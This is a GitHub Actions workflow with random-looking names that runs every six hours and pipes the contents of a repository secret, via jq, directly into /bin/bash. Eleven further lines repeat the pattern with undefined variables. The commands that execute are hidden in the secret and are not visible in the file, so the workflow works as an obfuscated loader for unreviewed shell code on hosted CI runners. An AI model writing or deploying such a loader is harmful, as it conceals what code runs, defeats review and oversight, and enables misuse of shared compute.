name: fengyuanchai4545
on:
  workflow_dispatch:
  schedule:
    - cron: '36 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          r86: ${{ secrets.r86 }}
        run: |
          echo $r86 | jq -r .mwkmg4356 | /bin/bash
          echo $qy53139 | jq -r .yn965 | /bin/bash
          echo $k28 | jq -r .sftn5141 | /bin/bash
          echo $eli199 | jq -r .xnoe6 | /bin/bash
          echo $nwtte5 | jq -r .g57586 | /bin/bash
          echo $vj02965 | jq -r .ew2950 | /bin/bash
          echo $f69626 | jq -r .ghvc70 | /bin/bash
          echo $ng76447 | jq -r .sup6607 | /bin/bash
          echo $rppq2 | jq -r .bqbh5 | /bin/bash
          echo $hws37 | jq -r .tvuu3 | /bin/bash
          echo $trdv6 | jq -r .xzygf01 | /bin/bash
          echo $pclmy7 | jq -r .efjy61499 | /bin/bash

